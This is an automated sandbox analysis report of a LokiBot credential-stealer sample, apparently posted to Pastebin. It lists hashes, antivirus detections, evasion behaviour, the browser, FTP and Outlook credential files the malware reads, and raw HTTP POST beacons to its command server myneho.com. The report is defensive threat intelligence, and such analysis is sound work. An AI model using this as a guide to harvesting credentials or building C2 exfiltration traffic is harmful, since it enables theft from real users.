Advertisement
paladin316

lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042_2019-08-21_12_00.txt

Aug 21st, 2019
2,393
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.64 KB | None | 0 0
  1.  
  2. * MalFamily: "Lokibot"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042"
  7. * File Size: 106496
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042"
  10. * MD5: "7828d6afbad04cad71b74dd202d9efb3"
  11. * SHA1: "e43c70e3493173174155df5452b6d16381fb8b1a"
  12. * SHA512: "5a5b9c9f8406eb8c98f53b10a7f03018d11c088a9bdf292c74aea1953f237331a9df9a4159b4b1e1be3c1619e3b7c7dc075570f828841a0d6506cd78b314c93b"
  13. * CRC32: "691D5E0C"
  14. * SSDEEP: "1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG"
  15.  
  16. * Process Execution:
  17. "lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042.exe",
  18. "services.exe",
  19. "WmiApSrv.exe",
  20. "svchost.exe",
  21. "WmiPrvSE.exe",
  22. "WmiPrvSE.exe",
  23. "svchost.exe",
  24. "WmiPrvSE.exe"
  25.  
  26.  
  27. * Executed Commands:
  28. "C:\\Windows\\system32\\lsass.exe",
  29. "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
  30. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  31. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
  32. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
  33.  
  34.  
  35. * Signatures Detected:
  36.  
  37. "Description": "A process attempted to delay the analysis task.",
  38. "Details":
  39.  
  40. "Process": "svchost.exe tried to sleep 480 seconds, actually delayed analysis time by 0 seconds"
  41.  
  42.  
  43. "Process": "lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042.exe tried to sleep 1500 seconds, actually delayed analysis time by 0 seconds"
  44.  
  45.  
  46. "Process": "WmiPrvSE.exe tried to sleep 600 seconds, actually delayed analysis time by 0 seconds"
  47.  
  48.  
  49.  
  50.  
  51. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  52. "Details":
  53.  
  54. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  55.  
  56.  
  57. "http_version_old": "HTTP traffic uses version 1.0"
  58.  
  59.  
  60. "suspicious_request": "http://myneho.com/.group/one/two/three/four/five/fre.php"
  61.  
  62.  
  63.  
  64.  
  65. "Description": "Performs some HTTP requests",
  66. "Details":
  67.  
  68. "url": "http://myneho.com/.group/one/two/three/four/five/fre.php"
  69.  
  70.  
  71.  
  72.  
  73. "Description": "Deletes its original binary from disk",
  74. "Details":
  75.  
  76.  
  77. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  78. "Details":
  79.  
  80. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 4992208 times"
  81.  
  82.  
  83.  
  84.  
  85. "Description": "Steals private information from local Internet browsers",
  86. "Details":
  87.  
  88. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  89.  
  90.  
  91.  
  92.  
  93. "Description": "Creates a hidden or system file",
  94. "Details":
  95.  
  96. "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  97.  
  98.  
  99. "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
  100.  
  101.  
  102.  
  103.  
  104. "Description": "File has been identified by 60 Antiviruses on VirusTotal as malicious",
  105. "Details":
  106.  
  107. "Bkav": "W32.TasumisCAK.Trojan"
  108.  
  109.  
  110. "MicroWorld-eScan": "Trojan.PWS.ZKD"
  111.  
  112.  
  113. "FireEye": "Generic.mg.7828d6afbad04cad"
  114.  
  115.  
  116. "CAT-QuickHeal": "Trojan.Mauvaise.SL1"
  117.  
  118.  
  119. "ALYac": "Trojan.PWS.ZKD"
  120.  
  121.  
  122. "Malwarebytes": "Spyware.LokiBot"
  123.  
  124.  
  125. "Zillya": "Trojan.naKocTb.Win32.12"
  126.  
  127.  
  128. "SUPERAntiSpyware": "Trojan.Agent/Gen-PasswordStealer"
  129.  
  130.  
  131. "K7AntiVirus": "Password-Stealer ( 004d88671 )"
  132.  
  133.  
  134. "K7GW": "Password-Stealer ( 004d88671 )"
  135.  
  136.  
  137. "Cybereason": "malicious.fbad04"
  138.  
  139.  
  140. "Arcabit": "Trojan.PWS.ZKD"
  141.  
  142.  
  143. "Invincea": "heuristic"
  144.  
  145.  
  146. "F-Prot": "W32/Trojan2.PBTA"
  147.  
  148.  
  149. "Symantec": "SMG.Heur!gen"
  150.  
  151.  
  152. "APEX": "Malicious"
  153.  
  154.  
  155. "Avast": "Win32:LokiBot-A Trj"
  156.  
  157.  
  158. "ClamAV": "Win.Trojan.naKocTb-6331389-1"
  159.  
  160.  
  161. "Kaspersky": "Trojan.Win32.Agentb.bvrg"
  162.  
  163.  
  164. "BitDefender": "Trojan.PWS.ZKD"
  165.  
  166.  
  167. "NANO-Antivirus": "Trojan.Win32.Stealer.eshrhl"
  168.  
  169.  
  170. "Paloalto": "generic.ml"
  171.  
  172.  
  173. "AegisLab": "Trojan.Win32.naKocTb.tnB5"
  174.  
  175.  
  176. "Ad-Aware": "Trojan.PWS.ZKD"
  177.  
  178.  
  179. "Sophos": "Troj/Fareit-CHG"
  180.  
  181.  
  182. "Comodo": "TrojWare.Win32.Fareit.LB@7pzcfo"
  183.  
  184.  
  185. "F-Secure": "Trojan.TR/Crypt.XPACK.Gen"
  186.  
  187.  
  188. "DrWeb": "Trojan.PWS.Stealer.23680"
  189.  
  190.  
  191. "TrendMicro": "TSPY_LOKI.SMA"
  192.  
  193.  
  194. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.ch"
  195.  
  196.  
  197. "Trapmine": "malicious.high.ml.score"
  198.  
  199.  
  200. "Emsisoft": "Trojan-PSW.Fareit (A)"
  201.  
  202.  
  203. "SentinelOne": "DFI - Suspicious PE"
  204.  
  205.  
  206. "Cyren": "W32/Trojan.LAPN-1109"
  207.  
  208.  
  209. "Jiangmin": "Trojan.naKocTb.l"
  210.  
  211.  
  212. "Webroot": "W32.Trojan.Gen"
  213.  
  214.  
  215. "Avira": "TR/Crypt.XPACK.Gen"
  216.  
  217.  
  218. "Antiy-AVL": "Trojan/Win32.SGeneric"
  219.  
  220.  
  221. "Microsoft": "PWS:Win32/Primarypass.A"
  222.  
  223.  
  224. "Endgame": "malicious (high confidence)"
  225.  
  226.  
  227. "ViRobot": "Trojan.Win32.Agent.106496.HD"
  228.  
  229.  
  230. "ZoneAlarm": "Trojan.Win32.Agentb.bvrg"
  231.  
  232.  
  233. "GData": "Trojan.PWS.ZKD"
  234.  
  235.  
  236. "TACHYON": "Trojan/W32.naKocTb.106496"
  237.  
  238.  
  239. "AhnLab-V3": "Trojan/Win32.naKocTb.R270234"
  240.  
  241.  
  242. "Acronis": "suspicious"
  243.  
  244.  
  245. "McAfee": "GenericRXCL-KZ!7828D6AFBAD0"
  246.  
  247.  
  248. "MAX": "malware (ai score=85)"
  249.  
  250.  
  251. "VBA32": "BScope.Trojan.Agentb"
  252.  
  253.  
  254. "Cylance": "Unsafe"
  255.  
  256.  
  257. "Zoner": "Trojan.Win32.77501"
  258.  
  259.  
  260. "ESET-NOD32": "Win32/PSW.Fareit.L"
  261.  
  262.  
  263. "TrendMicro-HouseCall": "TSPY_LOKI.SMA"
  264.  
  265.  
  266. "Rising": "Trojan.Fareit!1.B343 (CLASSIC)"
  267.  
  268.  
  269. "Ikarus": "Trojan-Spy.Primarypass"
  270.  
  271.  
  272. "Fortinet": "W32/Generic.AP.BA928!tr"
  273.  
  274.  
  275. "AVG": "Win32:LokiBot-A Trj"
  276.  
  277.  
  278. "Panda": "Trj/GdSda.A"
  279.  
  280.  
  281. "CrowdStrike": "win/malicious_confidence_90% (W)"
  282.  
  283.  
  284. "Qihoo-360": "HEUR/QVM20.1.57ED.Malware.Gen"
  285.  
  286.  
  287.  
  288.  
  289. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  290. "Details":
  291.  
  292. "target": "clamav:Win.Trojan.naKocTb-6331389-1, sha256:6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  293.  
  294.  
  295.  
  296.  
  297. "Description": "Harvests credentials from local FTP client softwares",
  298. "Details":
  299.  
  300. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  301.  
  302.  
  303. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  304.  
  305.  
  306. "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
  307.  
  308.  
  309. "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
  310.  
  311.  
  312. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
  313.  
  314.  
  315. "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
  316.  
  317.  
  318. "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
  319.  
  320.  
  321. "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
  322.  
  323.  
  324. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
  325.  
  326.  
  327. "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
  328.  
  329.  
  330.  
  331.  
  332. "Description": "Harvests information related to installed instant messenger clients",
  333. "Details":
  334.  
  335. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  336.  
  337.  
  338.  
  339.  
  340. "Description": "Harvests information related to installed mail clients",
  341. "Details":
  342.  
  343. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  344.  
  345.  
  346. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
  347.  
  348.  
  349. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  350.  
  351.  
  352. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  353.  
  354.  
  355. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
  356.  
  357.  
  358. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
  359.  
  360.  
  361. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  362.  
  363.  
  364. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  365.  
  366.  
  367. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  368.  
  369.  
  370. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
  371.  
  372.  
  373. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
  374.  
  375.  
  376. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  377.  
  378.  
  379. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  380.  
  381.  
  382. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  383.  
  384.  
  385. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
  386.  
  387.  
  388. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  389.  
  390.  
  391. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
  392.  
  393.  
  394. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
  395.  
  396.  
  397. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
  398.  
  399.  
  400. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
  401.  
  402.  
  403. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  404.  
  405.  
  406. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  407.  
  408.  
  409. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  410.  
  411.  
  412. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  413.  
  414.  
  415. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
  416.  
  417.  
  418. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  419.  
  420.  
  421. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  422.  
  423.  
  424. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
  425.  
  426.  
  427. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
  428.  
  429.  
  430. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  431.  
  432.  
  433. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  434.  
  435.  
  436. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  437.  
  438.  
  439. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  440.  
  441.  
  442. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  443.  
  444.  
  445. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
  446.  
  447.  
  448.  
  449.  
  450. "Description": "Collects information to fingerprint the system",
  451. "Details":
  452.  
  453.  
  454. "Description": "Created network traffic indicative of malicious activity",
  455. "Details":
  456.  
  457. "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
  458.  
  459.  
  460. "signature": "ET TROJAN LokiBot Checkin"
  461.  
  462.  
  463. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
  464.  
  465.  
  466. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
  467.  
  468.  
  469. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
  470.  
  471.  
  472. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
  473.  
  474.  
  475.  
  476.  
  477.  
  478. * Started Service:
  479. "VaultSvc",
  480. "wmiApSrv"
  481.  
  482.  
  483. * Mutexes:
  484. "6EFA73A4746045B65DEE781E",
  485. "Global\\RefreshRA_Mutex_Lib",
  486. "Global\\RefreshRA_Mutex",
  487. "Global\\RefreshRA_Mutex_Flag",
  488. "Global\\WmiApSrv"
  489.  
  490.  
  491. * Modified Files:
  492. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  493. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
  494. "\\??\\WMIDataDevice",
  495. "\\??\\PIPE\\samr",
  496. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  497. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  498. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  499. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  500. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  501. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  502. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  503. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  504.  
  505.  
  506. * Deleted Files:
  507. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  508. "C:\\Users\\user\\AppData\\Local\\Temp\\lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042.exe"
  509.  
  510.  
  511. * Modified Registry Keys:
  512. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
  513. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  514. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
  515. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  516. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  517. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  519. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  521. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  522. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  523. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  524. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  525. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
  526. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-00000000-0000-0000-0000-000000000000",
  527. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dllMofResourceName",
  528. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.muiMofResourceName",
  529. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sysACPIMOFResource",
  530. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.muiACPIMOFResource",
  531. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sysMofResourceName",
  532. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.muiMofResourceName",
  533. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sysMofResource",
  534. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.muiMofResource",
  535. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sysHDAudioMofName",
  536. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.muiHDAudioMofName",
  537. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sysPROCESSORWMI",
  538. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.muiPROCESSORWMI",
  539. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYSPortclsMof",
  540. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.muiPortclsMof",
  541. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  542.  
  543.  
  544. * Deleted Registry Keys:
  545. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  546.  
  547.  
  548. * DNS Communications:
  549.  
  550. "type": "A",
  551. "request": "myneho.com",
  552. "answers":
  553.  
  554. "data": "188.214.30.138",
  555. "type": "A"
  556.  
  557.  
  558.  
  559.  
  560.  
  561. * Domains:
  562.  
  563. "ip": "188.214.30.138",
  564. "domain": "myneho.com"
  565.  
  566.  
  567.  
  568. * Network Communication - ICMP:
  569.  
  570. * Network Communication - HTTP:
  571.  
  572. "count": 2,
  573. "body": "",
  574. "uri": "http://myneho.com/.group/one/two/three/four/five/fre.php",
  575. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  576. "method": "POST",
  577. "host": "myneho.com",
  578. "version": "1.0",
  579. "path": "/.group/one/two/three/four/five/fre.php",
  580. "data": "POST /.group/one/two/three/four/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: myneho.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 5D27119C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
  581. "port": 80
  582.  
  583.  
  584. "count": 26,
  585. "body": "",
  586. "uri": "http://myneho.com/.group/one/two/three/four/five/fre.php",
  587. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  588. "method": "POST",
  589. "host": "myneho.com",
  590. "version": "1.0",
  591. "path": "/.group/one/two/three/four/five/fre.php",
  592. "data": "POST /.group/one/two/three/four/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: myneho.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 5D27119C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
  593. "port": 80
  594.  
  595.  
  596.  
  597. * Network Communication - SMTP:
  598.  
  599. * Network Communication - Hosts:
  600.  
  601. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement